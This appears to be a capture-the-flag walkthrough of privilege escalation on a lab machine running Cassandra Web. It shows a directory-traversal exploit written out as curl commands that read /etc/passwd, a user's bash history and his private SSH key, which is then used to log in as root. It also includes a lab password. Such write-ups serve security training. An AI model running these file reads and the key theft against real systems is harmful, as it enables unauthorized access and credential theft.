Privilege escalation

I have a password for a user named as cassie so, I will switch to that user.

cassie:'SecondBiteTheApple330'

I will see the help for this binary.

cassandra-web -h

Let's run this web server.

sudo cassandra-web -B 0.0.0.0:4444 -u cassie -p SecondBiteTheApple330

We have web server running at port 4444.

Cassandra Web 0.5.0 - Remote File ReadExploit Database

According to this exploit. We know that Cassandra web is vulnerable to Remote File Read (Directory Traversal). We will exploit this to read the .bash_history file for the user.

Add a list of files that can be read using Directory traversal in Cheatsheet.

curl --path-as-is localhost:4444/../../../../../../../../../../../../../etc/passwd

Confirmed that it is vulnerable to Directory traversal. Then I read the bash history file of Anthony user.

curl --path-as-is localhost:4444/../../../../../../../../../../../../../home/anthony/.bash_history

I found that an SSH key has been generated for the user Anthony, and the same SSH key has been copied to the root user. This means that if I am able to grab Anthony's SSH key, I can log in as the root user. I will grap the private SSH key.

curl --path-as-is localhost:4444/../../../../../../../../../../../../../home/anthony/.ssh/id_rsa

Save it.

Give permission to SSH key and then connect to root user.

chmod 600 id_rsa

ssh root@$clue -i id_rsa

PreviousCassandra Web 3000 [Initial]NextFlags

Last updated 1 year ago